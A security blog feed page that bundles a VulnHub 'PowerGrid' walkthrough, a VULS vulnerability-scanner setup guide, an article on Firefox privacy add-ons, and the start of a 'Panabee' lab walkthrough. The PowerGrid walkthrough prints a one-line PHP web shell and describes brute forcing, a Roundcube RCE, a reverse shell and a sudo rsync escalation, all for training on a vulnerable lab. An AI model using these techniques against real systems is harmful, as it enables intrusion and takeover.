Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all 1824 articles
Browse latest View live

PowerGrid: 1.0.1 Vulnhub Walkthrough

$
0
0

Today we are going to solve another boot2root challenge called "PowerGrid: 1.0.1".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to Thomas Williams. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

Exploiting

  • HTTP Basic Authentication Brute Force
  • Execute remote code (RCE) Roundcube exploit
  • Decrypt key PGP and abuse for SSH

Privilege Escalation

§  Abuse of sudo Rsync

§  Abuse of pivoting SSH

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX



So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A –p- powergrid.vh

 


Enumeration

The game begins and the burden, since we will only have 3 hours to solve the challenge and thus save the critical infrastructure.

We access the web service, we see the time, but we also list three users: deez1, p48 and all2.



We use dirsearch and list a directory protected with HTTP Authentication Basic.




With what we found and knowing 3 users, we will make a brute force attack with the Hydra tool and the rockyou dictionary.



We managed to access with the credentials obtained and listed a webmail with Roundcube.



We use the same credentials and can read a single email, in it we have an encrypted message in PGP, but to be able to read its content in plain, we need the private key and the password. It is very likely that it is the same password, since this user has reused the same password for several services.



Exploiting

We listed the version of Roundcube and looked for exploits, we found that it has a version vulnerable to RCE (Remote Code Execution)


Exploit: https://www.exploit-db.com/exploits/40892

As always, we will review what the exploitation consists of and make a proof of concept, this proof will create a info.php file.



Legitimate request:



Malicious request:



We run the file and see that the site is indeed vulnerable.



Now we will create a php file that allows us to execute arbitrary commands.

Payload URL-encode:<?php passthru($_GET['cmd']); ?>



We check that our file works:



Perfect! Now we'll put a netcaton the wire and run a reverse shell. (remember to encode it in URL-encode all characters)


Great! Now we will use our two favorite commands to get an interactive shell.



We will go through files and directories recursively, we will stumble upon the firstflag and the first hint.



So let's start, we identify ourselves with the user "p48" reusing the same credentials and we find in his folder "/home/" the gpg private key(remember that it was the only one we were missing to be able to decipher the text).



For a strange reason, the native "gpg" tool didn't work for me, so I had to use this online tool and we get a SSH private key.



The machine we have committed to had no SSH service open, we remembered the "pivot" track, checked the connections and found a service that works by "docker".



We give 600 permissions to the private key and use it to connect via SSH to the docker docker and read the 2nd flag and the next hint.



The next hint leads me to run "sudo -l" and check that you can run the rsyncbinary as root.  We execute the following command to escalate privileges as root abusing this advantage.

And once being root, we access its folder and read the 3rd flag and the next hint.



Privilege Escalation (root)

"backwards? pivoting?" Let's repeat the SSH move, but this time we will do it from the compromised docker machine.

Great! We have permissions as root and we can read the last flag.



Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedInand Twitter.


VULS- An Agentless Vulnerability Scanner

$
0
0

VULS is an open-source agentless vulnerability scanner that is written In GO Language for Linux Systems. For server Administrator having to perform software updates and security vulnerability analysis daily can be a burden. VULS can be useful or helpful to automate Vulnerability Analysis and to Avoid the burden of manually performing of Vulnerability analysis of the software installed on the system.  It uses multiple Vulnerability databases, such as Metasploit, Exploit DB, NVD (National Vulnerability Database).

 

Table of content

·         Vuls

§  Key Features

§  Architecture

·         Prerequisites

·         Installation & Configuration of Dependencies

§  Installing Dependencies

§  Installation & Configuration of GO-CVE-Dictionary

§  Installation & Configuration of Goval-Dictionary

§  Installation & Configuration of Gost

·         Install and Configure VULS

§  Install and configure VULS repo (GUI) Server

§  Requirements

§  Installation

§  Usage

§  DigestAuth

§  Configuration of TOML file

·         Running Local Scan

·         Scanning Multiple Remote Host systems

 

 

Vuls Feature & Architecture

Key Features

 

·         VULS provides a way of automating Vulnerability for Linux packages

·         VULS can be installed on all Linux based distros for example: - Linux, Ubuntu, Debian, FreeBSD, CentOS, Solaris, and so on…

·         VULS has the ability to scan multiple systems at a single time by using SSH protocol and to send reports via Slack or Email.

·         VULS uses three Scan modes Fast, Fast Root, and Deep you can select according to Situation or as per your requirements.

·         Scan results can be Viewed by using TUI (Terminal user interface) and GUI (Graphical user interface).

·         When generating reports VULS prioritizes High Severity Vulnerabilities using an established ranking system from Database.

 

Architecture

 



 

Fast Scan: - It performs scans without root privilege, No dependencies, almost no load on the scan target server.

 

Fast-root Scan: - It performs scans with root privilege, no dependencies, almost no load on the scan target server.

 

Deep Scan: - It performs a scan with root privilege, containing all dependencies, almost full load on scan target server.

 

Offline Scan Mode: - Fast, Fast-root, and Deep have Offline Scan Mode. VULS can Scan with no internet access with offline scan mode.

 

Now we see how to install and Configure VULS as a Vulnerability scanner for further investigations.

 

 

Let’s take a look 🤔!!

 

Prerequisites

 

To configure VULS in your Ubuntu platform, there are some prerequisites required for installation.

§  Ubuntu 20.04.1 with minimum 4GB RAM and 2 CPU

§  SSH Access with Root Privileges

§  Firewall Port: - 5111

§  Multiple servers running (ubuntu 20.04 or any vulnerable server) if you want to set up VULS to scan remotely.

Installation & Configuration of Dependencies

 Let’s begin the installation process

Note: - The whole installation process will take a long time to finish so make your self comfortable and begin the installation process.

 Installing Dependencies

In this section, we’re going to create a folder Vuls-data. VULS uses SQLite to store their vulnerability information so, that we’re going to install SQLite, Go programming language, and other dependencies.

 

We are going to store all VULS related data in the /usr/share/vuls-data directory. To create it run the following as described below.

 

mkdir /usr/share/vuls-data

 

Now we have created vuls-data folder where we are going to store all data, and this will be our workspace before getting started let’s install the required dependencies.

Now, we’re going to install

·         SQLite: -VULS uses SQLite to store its vulnerability information.

·         Debian-goodies: - it is the check restart utility that provides the information which package needs to be restarted in any moment.

·         GCC: - GNU compiler collection is a compiler system. GCC is a toolchain and the standard compiler for Unix-like systems.

·         Wget

·         Make: -Make is used to detect automatically which part of a large program need to be recompiled and issue the commands to recompile them.

Install all dependencies by using the following command.

 

apt install sqlite git debian-goodies gcc make wget

 


now you have installed the required dependencies Next, install GO using snap package manager by issuing the following command

 

snap install go --classic

 

Next, you need to set up a few environment variables for Go that specifies the working directory for Go.

To prevent from setting these variables every time the user logs on you need to automate this process by creating an executable file go-env.sh under /etc/profile.d. This will execute the directory every time the users log on. To automate this process, follow the below commands.

 

nano /etc/profile.d/go-env.sh

 

Add the following commands to the file:

 

export GOPATH=$HOME/go

export PATH=$PATH:$GOPATH/bin:/snap/bin

 

Still go-env.sh file is not executable. Make it executable by running by changing the permission of that file or directly running by the following command.

 

chmod +x /etc/profile.d/go-env.sh

 

And then reload the environment variables by running the following command.

 

source /etc/profile.d/go-env.sh

 

Installation & Configuration of Go-CVE-dictionary

Let’s download and install go-cve-dictionary. The go-cve-dictionary is a tool that provides access to NVD (National Vulnerability Database). NVD is the US government repository of publicly reported cybersecurity vulnerabilities, that contains vulnerability IDs (CVE — Common Vulnerabilities and Exposures), summaries, and impact analysis, and is available in a machine-readable format. You can access the NVD using the Go package. Then you’ll need to run and fetch vulnerability data for VULS to use.

Let’s install Go-cve-dictionary under $GOPATH/src/ by cloning GO packages from GitHub which is made by Kotakanbe and compiling it afterward.

 

Let’s start it by creating a directory where to store Go-cve-dictionary by running the following command.

 

mkdir -p $GOPATH/src/github.com/Kotakanbe

 

Navigate to it and clone g0-cve-dictionary from GitHub by issuing the following command

 

cd $GOPATH/src/github.com/kotakanbe

git clone https://github.com/kotakanbe/go-cve-dictionary.git

 

And then navigate to the cloned package further then start installation.

 

cd go-cve-dictionary

make install

 



 

Further then, make it available wide into your system copy It to /usr/local/bin by running below command.

 

cp $GOPATH/bin/go-cve-dictionary /usr/local/bin

 

go-cve dictionary requires a log output directory and logs are generally created under /var/logs/.

Let’s create a directory for go-cve-dictionary and the log directory is readable by everyone restrict to current user by issuing following command.

 

mkdir /var/log/vuls

chmod 700 /var/log/vuls

 



 

Now fetch vulnerability data from NVD and store it to VULS workspace under /usr/share/vuls-data:

 

for i in `seq 2014 $(date +"%Y")`; do sudo go-cve-dictionary fetchnvd -dbpath /usr/share/vuls-data/cve.sqlite3 -years $i; done

 

In my case I’m cloning the cve database from the year 2014 this will download the NVD data from 2014 to the current year you can clone or download data as desired year as you want.

 

NOTE: - This command will take a long time to finish, till then go get served you with a Coffee ☕.

 

 

Installation & Configuration of goval-dictionary

Let’s download and install “goval-dictionary”. The goval-dictionary is a tool that will copy the OVAL (Open Vulnerability and Assessment Language) which is an open language used to express checks for determining whether software vulnerabilities exist on a given system and provides access to the OVAL database for Ubuntu.

The goval-dictionary is also written by Kotakanbe so, install goval-dictionary in the same folder that previously you created under “$GOPATH/src/github.com/Kotakanbe” and then clone the Package from the GitHub by running the following command.

 

cd $GOPATH/src/github.com/kotakanbe

git clone https://github.com/kotakanbe/goval-dictionary.git

 

And then navigate to the cloned package further then compile or install it with “make” by running the following command.

 

cd goval-dictionary

make install

 


 

Copy it to /usr/local/bin to make it globally accessible and then after that Fetch the OVAL data for Ubuntu 20.x or another version as per your requirement by running the following command.

 

cp $GOPATH/bin/goval-dictionary /usr/local/bin

goval-dictionary fetch-ubuntu -dbpath=/usr/share/vuls-data/oval.sqlite3 20

 


Installation & Configuration of gost

 

Let’s download and install “gost”. Gost is a Debian security Bug tracker that collects all information about the vulnerability status of packages distributed with Debian and provides access to the Debian security bug tracker database.

Let’s install this package into a new folder by running the following command:

 

mkdir -p $GOPATH/src/github.com/knqyf263

 

Navigate to the folder just you have created after that, clone the gost packages from GitHub, and then make install by running the following command:

 

cd $GOPATH/src/github.com/knqyf263

sudo git clone https://github.com/knqyf263/gost.git

 

After it finishes entering to the cloned package than “make install”

 

cd gost

make install

 

Don’t forget to make it accessible globally and then link its database to the /usr/share/vuls-data by running following command:

 

cp $GOPATH/bin/gost /usr/local/bin

ln -s $GOPATH/src/github.com/knqyf263/gost/gost.sqlite3  /usr/share/vuls-data/gost.sqlite3

 

Create a log file directory for gost it requires access to the log output directory and then restrict access to the current user by using the following command:

 

mkdir /var/log/gost

chmod 700 /var/log/gost

 

And then, fetch the Debian security tracker data by issuing the following command:

 

gost fetch debian

 

Install & Configure VULS

We have installed all required Dependencies of VULS. Now you can download and install Vuls from source code. Afterward, you’ll configure the VULS reps server which is the GUI interface of the VULS.

Let’s Create a new directory that contains the path to the Vuls repository, by issuing the following command:

 

mkdir -p $GOPATH/src/github.com/future-architect

 

Navigate to the created directory then Clone Vuls from GitHub by running the following command:

 

cd $GOPATH/src/github.com/future-architect

git clone https://github.com/future-architect/vuls.git

 

Enter to the Package Folder and then compile and install by running the following command:

 

cd vuls

make install

 

Also, don’t forget to make it accessible globally

 

cp $GOPATH/bin/vuls /usr/local/bin

 

Hmm 😃 !! you have successfully installed VULS in your system

 

Install & Configure VULS repo server (GUI)

 

VulsRepo is an awesome OSS Web UI for Vuls. With VulsRepo you can analyze the scan results like Excel pivot table.

 

Requirements

 

To configure VULS in your Ubuntu platform, there are some prerequisites required for installation.

·         future-architect/Vuls >= v0.4.0

·         Web Browser: Google Chrome or Firefox

 

Installation

 

In manner to install Vuls-repo server in your Ubuntu platform follow the steps as stated below

 

Step1. Installation

 

Clone the vuls-repo from GitHub by running the following command:

 

cd $HOME

git clone https://github.com/usiusi360/vulsrepo.git

Step 2. Change the setting of vulsrepo-server

 

Set Path according to your environment.

 

cd$HOME/vulsrepo/server

cp vulsrepo-config.toml.sample vulsrepo-config.toml

nano vulsrepo-config.toml

[Server]

rootPath = "/root/vulsrepo"

resultsPath  = "/usr/share/vuls-data/results"

serverPort  = "5111"

 


Step 3. Start vulsrepo-server

 

Start the vulsrepo-server by executing the below command under the directory

HOME/vulsrepo/server

 

cd$HOME/vulsrepo/server

./vulsrepo-server

 

You can also verify whether it is running or not by opening the below URL, you need to make sure port 5111 is open on your server firewall and then you can access vulsrepo-server on the web interface at

 

http://localhost:5111

 


Nice 😀 !! As you can see it is successfully installed

 

Step 4. Always activate vulsrepo-server

 

In Case: SystemV (/etc/init.d)

 

Copy startup file. Change the variable according to the environment.

 

cp $HOME/vulsrepo/server/scripts/vulsrepo.init /etc/init.d/vulsrepo

chmod 755 /etc/init.d/vulsrepo

nano /etc/init.d/vulsrepo

 


And then make changes conf file as per your environment

 


In Case of: systemd (systemctl)

 

Copy startup file. Change the variables according to the environment.

sudo cp $HOME/vulsrepo/server/scripts/vulsrepo.service /lib/systemd/system/vulsrepo.service

nano /lib/systemd/system/vulsrepo.service

 


And then make change in conf file as per your environment as shown below





start vulsrepo-server

systemctl start vulsrepo

 

Usage

 

Access the browser

 

http://<server-address>:5111

 

DigestAuth


create an authentication file to perform digest authentication,


./vulsrepo-server -h

./vulsrepo-server -m


Edit vulsrepo-config.toml

 

nano vulsrepo-config.toml

 

Use SSL

Create a self-signed certificate by issuing the following command

 

openssl genrsa -out key.pem 2048

openssl req -new -x509 -sha256 -key key.pem -out cert.pem -days 3650

 

Edit vulsrepo-config.toml file as shown below by running the following command

 

nano vulsrepo-config.toml

 



 

Start vulsrepo-server

 

Restart Vulsrepo-server by running the following command:

 

systemctl restart vulsrepo-server

 

And then visit the web interface, enter the login credentials that you created during the installation process to access the GUI interface. Once you logged in then you will have your VULS GUI Dashboard ready to set fire on the Vulnerability 😊.

 

Configuration of TOML file

 

Now, it’s time to create a configuration file for Vuls. Navigate back to /usr/share/vuls-data:

 

cd /usr/share/vuls-data

 

Vuls stores its configuration in a TOML file, which is config.toml. Create by issuing the following command:

 

nano config.toml

 



 

And then Enter the following configuration:

 

[cveDict]

type = "sqlite3"

SQLite3Path = "/usr/share/vuls-data/cve.sqlite3"

 

[ovalDict]

type = "sqlite3"

SQLite3Path = "/usr/share/vuls-data/oval.sqlite3"

 

[gost]

type = "sqlite3"

SQLite3Path = "/usr/share/vuls-data/gost.sqlite3"

 

[servers]

 

[servers.localhost]

host = "localhost"

port = "local"

scanMode = [ "fast" ]

#scanMode = ["fast", "fast-root", "deep", "offline"]

 

Then save and close the file.

 

Ok 😃 !! you have successfully created a conf.toml file

To test the validity of the configuration file, run the following command:

 

vuls configtest

 

Congratulations!! You’ve installed and configured Vuls to scan the local server on your Ubuntu Platform😉.

 

Running local Scan

Exited? let's do it 😁 !!

 

The default scan mode, if not explicitly specified, is fast.

To run a scan, execute the following command:

 

vuls scan

 


Wow  !! As we can see it scanned the whole system and generated a report

Wait this is not enough… Let’s what's inside the report

To check the report on TUI (Terminal based user interface) issue the following command

vuls tui

 

Vuls divides the generated report view into four panels as stated below:

 

·         Scanned hosts: located on the upper left, lists hosts that Vuls scanned.

·         Found vulnerabilities: located right of the hosts list, shows the vulnerabilities that VULS found in installed packages.

·         Vulnerabilities information: it is up of the left part of the screen, that shows detailed information about the vulnerability, pulled from the databases.

·         Vulnerable packages: located right of the detailed information, shows the affected packages and their versions.

 



 

Aha 😵 !! It’s hilarious

 

Let’s check the How the GUI shows these results

 

Get back to the GUI Dashboard and then mark and submit the generated report that you want to view as shown below

 

And then see the magic 🙃 !!

 



 

As we can see it converted to JSON report inti GUI with detailed information. By tapping on CVE ids you can more information about their vulnerability.

Also, you can filter this report as per your known by dragging the required report from the Heatmap section to Count as shown below.

 



 

Let’s make it more informative by applying filters as shown below:

 


Scanning Multiple remote host systems

 

Step 1: Enable to SSH from localhost

Vuls doesn’t support SSH password authentication. So we have to use SSH key-based authentication. Create a key pair on the localhost then copy the id_rsa.pub key to 
authorized_keys on the remote host.

 

On Localhost:

 

ssh-keygen -t rsa

 

Copy /.ssh/id_rsa.pub key to the clipboard.

 

And go to the Remote Host and issue the following command:

 

mkdir ~/.ssh

chmod 700 ~/.ssh

nano ~/.ssh/authorized_keys

 

and then Paste the rsa.pub key from the clipboard to ~/.ssh/authorized_keys and then follow the below steps:

 

chmod 600 ~/.ssh/authorized_keys

 

 

Come back to the Localhost:

 

And also, we need to confirm that the host keys of the remote scan target has been registered in the known_hosts of the localhost. Further, then we need to add the remote host’s Host Key to $HOME/.ssh/known_hosts, log in to the remote host through SSH before scanning.

 

 

ssh root@192.168.29.219 -i ~/.ssh/id_rsa

 

where 192.168.29.219 is the IP of remote Host

 

Step 2: Configure (config.toml) as shown below

 

cd /usr/share/vuls-data

nano config.toml

 

[servers.ignite]

 host        = "192.168.29.219"

 port        = "22"

 user        = "root"

 keyPath     = "/root/.ssh/id_rsa"




 

Check and verify config.toml and settings on the server before scanning:

 

vuls configtest

 

Start scanning remote host by issuing the below command:

 

vuls scan

 



 

Congratulation 🙂!! As you can see you have been successfully scanned your remote host. Let’s check the generated report on the GUI dashboard.

 


By applying more filters, you can make you can hunt or investigate Vulnerable packages more deeper.

 

Let’s end Here !! 😊

Firefox for Pentester: Privacy and Protection Add-ons

$
0
0

In today’s article, we will facilitate ourselves with the skill of protecting us online. Firefox is a web browser developed by Mozilla. With its latest quantum update, it provides us with improved speed and unique design. Firefox is an amazing web browser, its user friendly and customizable. When we talk about penetration testers or security analysts; Firefox is the go-to browser for it. It has various add-ons that help us to protect us online and allow us to have some privacy post-Snowden revelations. The internet is the big unknown and the most non-trustable world in itself. Every month or so there are data breaches and malware attacks such as ransomware and other than this you are never secure. Various websites poach your data, personal information, etc. Accidentally stumbling upon an ad and then being bombarded with it. Now, if you are looking to get away from all this, then this article is the answer for you. But before can talk about the various add-on that helps us to stay protected, we will talk about profiling in Firefox.

Table of Content:

·         Profiling in Firefox

·         Plug-ins

o  uBlock Origin

o  uMatrix

o  HTTPS Everywhere

o  Privacy settings

o  No Script

o  Privacy Badger

o  Decentraleyes

o  Terms of Service: Didn’t Read

o  Snowflake

o  Temporary Containers

Profiling in Firefox

In Firefox, you can create various profiles according to your needs in the browser as these profiles are customizable.  For instance, you can have one profile for research purposes and others for VAPT. Creating these profiles is convenient and quite easy.  To create a profile, open your Firefox browser and type “about:profiles” in the URL tab. Then simply left-click on “Create New Tab”. as shown in the image below:



Once you click on “Create New Profile”, a dialogue box will open. Fill the name of the profile you want like here like we gave “Research_division”. After that click on the “Finish” button and the profile will be created.

 


Similarly, you can create as many profiles as you want with different names depending on your needs. In the image below you can see that we have created yet another profile by the name of Privacy and Protections. The default location of every profile in windows is C:\Users\%username%\AppData\Roaming\Mozilla\Firefox\Profiles and in Linux the path will be /root.mozilla/firefox/. Privacy and Protection (as shown in the image below) but you can always change it as per your desire.

 


Both of our profiles are created as we wanted with individual personalization, just as shown in the image below. These profiles separates all the information, plug-ins, and settings from one another. Once all the profiles are created it will give you an option whether you want to set a profile as default or launch it in new browser window. You can also rename or remove the profiles. It also gives you an option to directly open the directly where the profiles are located. You will find both root directory and local directory paths there.




Plug-ins

uBlock Origin

uBlock is created by Raymond Hill. It is an open-source extension. It blocks all the advertisement generally and especially the ones which can potentially be malicious. It even filters out the URL of various advertisement which use trackers to pursue your preferences and information. The major feature of this amazing ad blocker is that it even blocks the latest tracking techniques such as CNAMEs. When you traverse yourself from website to website, uBlock stops one website to share your data with another. This technique of websites sharing data with each other is  harder  to pinpoint with other ad blockers as this particular issue remains but,  with uBlock origin; this is not a problem. Along with all this, it also blocks pop-ups, cosmetic ads, remote fonts, even disables JavaScript. Bonus to this, it removes Youtube ads too.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 


uMatrix

uMatrix is an add-on created by Raymond Hill as well. This add-on was developed to easily control your web-content i.e. you can permit what will load on your browser and what not. This add-on works like a firewall prevents the websites to use your cookies and it protects you from malware, trackers, bloatware, etc. the important thing to remember, as the data loads in the browsers, is that as this add-on blocks tracker and disallow unnecessary codes to execute themselves; it increases internet and page load up speed. Even the bandwidth consumption improves. uMAtrix takes precautional steps and blocks third-party domain which makes it difficult to access some sites but that can be controlled depending on your demands. Things that you can control via uMatrix are:

·         Cookies

·         CSS

·         Image

·         Media

·         Scripts

·         XHR

·         Frame

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 



 

HTTPS Everywhere

There are a multitude of websites all over the internet that does not have SSL layer protection. Almost all of these are used as a decoy to hack or are prone to the Man In The Middle (MITM) attacks itself. Upon surfing the web, you can never be sure which website is which and whether it is safe to browse them. Hence, HTTPS Everywhere is the answer to this problem as it protects from such online threats. This browser extension provides you with an SSL/TSL layer of protection across the internet. This layer of protection enables you to encrypt whatever the information is sent or received from the website, which makes you data safe from attacks like spoofing, sniffing, MITM, etc.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.


Privacy Settings

This extension is developed by Jeremy Schomery. This is the most convenient extension as it brings all the privacy settings options together in one place. All the settings can be adjusted from the pop-menu of the extension. It has a tool panel for all our preferences. To provide you with privacy this extension makes sure that no data is sent to a third-party website.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.



 


NoScript Security Suite

NoScript Security Suite is developed by Giorgio Maone. It is referred to as a suite as it provides various security measures for both developers and security analysts. To be entirely secure, many security analysts argue that disabling JavaScript on the browser is an important practice. There are few but major browser vulnerabilities that exploit JavaScript to attack the target. Although almost all the websites try and make themselves secure from these vulnerabilities. But one can never be too sure. It’s a fool's errand to be entirely dependent on others for your protection. So, to protect themselves from their end comes to play too. And this extension helps us in achieving the said. NoScript helps to control the disabling the JavaScript as easily as possible. Here, it is important to note that many people will proclaim that today's browsers provide us with the option of disabling JavaScript, then why do we need this extension? Here, the point to be noted is that this option is limited (limitation depends on the browser) and you cannot control it as you can with NoScript. This extension actively blocks executable content which is dismissed all over the world. It also provides security against known security exploits. Most importantly it offers client-side security by giving security against cross-site scripting (XSS) and HTML injections as it identifies the malicious request and neutralizes it. This extension also brings Application Boundaries Enforcer, this enforcer works like a firewall, and the policies of this firewall can be defined by the user. It guards the entry point of the browser which in turn helps the user to be safe from the attacks like CSRF and DNS rebinding. Anti-Clickjacking and HTTPS enhancement is also provided by this superb extension.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 


 

Privacy Badger

This add-on is developed by EFF Technologists and they have done amazing work with this add-on. While surfing the internet, privacy is a must. But there is a swarm of tracking ads, clickbait ads, etc. online that interrupt your smooth surfing and bait you to fall victim to these without even knowing. The worst part is there is hardly a way to find out whether you are being tracked or not. We can simply identify the evidence, such as if you search for something online; be sure as hell that you are going to see ads regarding it for a long time, and hence the online tracking. The privacy badger extension comes handy here. This extension is praised as it blocks cookies that track you even if you delete them and it blocks third-party tracking too. Some third-party domains are required for the site to load itself, this requirement can be of maps, images, etc. Here, this tool will analyze it and allow the important requirements and disallow the tracking cookies and referrers. The cookies that have a tracking id or are hidden are not allowed because of this add-on. It even identifies super cookies that keep a track of you. The add-on works in incognito mode as well and allows you to whitelist the domains. The feature of whitelisting the domains is provided so that if you want to allow a tracking domain you can allow it as your requirement. This tool works by identifying the domain's behavior and it also has a yellow list. This yellow list contains the name of the websites that are surely collecting your data and tracking you.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 


 

Decentraleyes

Decentrelayes is developed by Thomas Reintjes. This is a wonderful add-on and must have you are serious about privacy and protection. Usually while browsing the internet, you are connected to public Content Delivery Network. This connection allows you to access important and necessary javascript libraries that allow the content to be loaded on your webpage. Now here is the thing, being constantly connected to public CDNs is insecure in terms of privacy and tracking and it’s a pickle because you can’t surf the net without such libraries. To all these problems, Decentrelayes is the solution. To server, you with the motto of privacy and anti-tracking Decenterelayes takes the necessary libraries and store them on your local machine. This way when you are online, you don't need to be connected to public CDNs as you can use the local ones. The fourteen JavaScript libraries provided by Decentrelayes are:

 

·         AngularJS

·         Backbone.js

·         Dojo

·         Ember.js

·         Ext Core

·         JQuery

·         JQuery UI

·         Modemizr

·         MooTools

·         Prototype

·         Scriptaculous

·         SWFObject

·         Underscore.js

·         Web Font Loader

 

And the list of networks supported by this marvelous extension is as following :

 

·         Google Hosted Libraries

·         Microsoft Ajax

·         Cloudflare

·         JSDelivr

·         Yandex CDN

·         Baidu CDN

·         Sina Public Resources

·         UpYun libraries

 

It works by analyzing HTML code. After studying the HTML data, it will take the public CDNs and swap it with the local ones that it provides. This way the request to the external CDN is never sent from the browser. Hence, they can’t track your online activity or access your data.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.



 


Terms of Service; Didn’t Read

Terms of Service; Didn’t Read is a browser extension developed by Abdullah Diaa, Hugo, Michiel de Jong. The name of the extension is a wordplay on the phrase “Too long; Didn’t Read”. This is the simplest and yet most important extension. When it comes to Terms and Services of a website, nobody wastes time in click "I Agree" or "I Accept". The sheer quantity and complicated text confuse everybody. We all do it but none of us has the tiniest bit of idea what we are agreeing to. Hence, this extension. This add-on comes handy as it grades the Terms of Services provided by various websites. These grades are from A to E; where A is best and E is worst. It also reviews the privacy policies as positive, negative, and neutral. Now after knowing the gest of Terms of Services through this extension, it is wholly on the user whether to access the website or not. The purpose of this add-on is to aware of the user of the authenticity of the sites that they are using and letting them know about the policies and what they are agreeing to; just so they can form an opinion and decide whether they want to continue or not. According to us, this is a must-have extension as different exploitation in terms of identity theft, data collection, accessing personal information, etc through Terms of Services unveils every other day.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 


 

Snowflake

Snowflake extension is created by The Tor Project. It was developed to give easy access to the Tor Network after the governments banned Tor bridges. As it is the Tor network, it allows you to be anonymous on the internet; all the while protecting your data and identity. This web browser extension allows you to tap into the tor network through a proxy and this network has multitudes of servers. The entry points to these servers are known as tor bridge and there are Tor relays too that bounce the traffic and helps one to stay anonymous as long as they are surfing. As it allows you to stay anonymous, you are protected against tracking and even your data could not be collected. It also helps with hiding IP address.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 



 

Temporary Containers

When you browse the internet traditionally, it saves all your cookies and cache in a single place. This makes it easy for them to steal our data, intrude on our privacy, and track us. But if you separately contain all this somewhere then the problem will be solved. And it is possible to do so with Temporary Containers. It allows you to create a container through which you can surf the internet without worry about being tracked. The containers created by this extension are secluded as it aims to segregate the data from the rest of the browser. These containers are the same as basic profiling provided by Firefox (as mentioned at the start of this article). And by combining both profiling and this Temporary Containers browser extension, your browser will create a secure and safer environment for you to surf through the internet as the containers are removed when the last tab is closed and so its data. Automatic or manual; both modes are supported by it. 

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

 



Conclusion

Major social media, shopping websites, and other webpages track you through your likes and dislikes, along with your location. Maintain a log of your every online activity. They even track the things that you start to write but do not post to track your self-censorship. And these are just a few things that we have mentioned. To get a better sense of internet tracking you can read this article here.And using all such add-ons, you can be safe and secure online by accessing quick and secure internet with amplified protection.

All of these Add-ons are open source and free to use. These are trustable Add-ons that provide security and privacy to any user using it. The best thing is all of these can be customised to the user's needs and requirements. Using these extensions consciously and properly will make you non-existent as far as the online tracking goes.

Panabee: 1: Vulnhub Walkthrough

$
0
0

Introduction

Today we are going to crack this vulnerable machine called Panabee: 1. It is created by ch4rm. He is available on Twitter by handle aniqfakhrul. This is a Boot to root kind of challenge. We need to get root privileges on the machine and read the root flag to complete the challenge. Overall it was an intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

·         Network Scanning

o   Nmap Port Scan

·         Enumeration

o   Browsing HTTP Service

o   Enumerating SMB Service

o   Bruteforcing FTP Credentials

o   Enumerating FTP Service

·         Exploitation

o   Exploiting File Upload Vulnerability

·         Post Exploitation

o   Enumerating Sudo Permissions

o   Uploading Malicious Script

o   Getting Jenny User Session

o   Downloading pspy64 script

o   Running pspy64 script

·         Privilege Escalation

o   Exploiting tmux for Root

·         Reading Root Flag

Walkthrough

Network Scanning

The IP Address of the machine is found to be 192.168.0.165. To move forward we need to find the services that are running on the machine. We can achieve this using a nmap Aggressive scan.  Nmap reveals a lot of services. We have the FTP (21), SSH (22), SMTP (25), HTTP (80), NetBIOS (139, 445).

nmap -p- -A 192.168.0.165



Enumeration

We start with the Enumeration stage. First Service we decided to take a look was HTTP. Upon looking at the IP Address in Web Browser we see a Apache2 Default Page. Nothing special to look here.



After this, Next service we decided to enumerate was SMB. We connected to the service using the smbclient tool. Here we see the bunch of shares that are hosted on the machine. The share “note” seemed to be worth looking into. We reconnect to that share. Here we find a text file by the same name. We download the text file onto our local system using the get command. We read the text file it was addressed to goper. Cool a username. The note aplogieses for a late response and mentions the server will backup whatever the files that are into the home directory of the user goper.

